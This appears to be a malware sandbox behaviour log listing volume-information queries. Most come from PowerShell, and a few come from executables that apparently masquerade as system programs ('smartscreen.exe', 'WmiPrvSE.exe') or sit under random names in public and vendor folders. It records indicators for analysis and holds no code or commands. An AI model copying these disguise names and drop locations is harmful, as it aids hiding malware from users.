Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
Source: C:\Users\user\Downloads\smartscreen.exe Queries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
Source: C:\Users\user\Downloads\smartscreen.exe Queries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
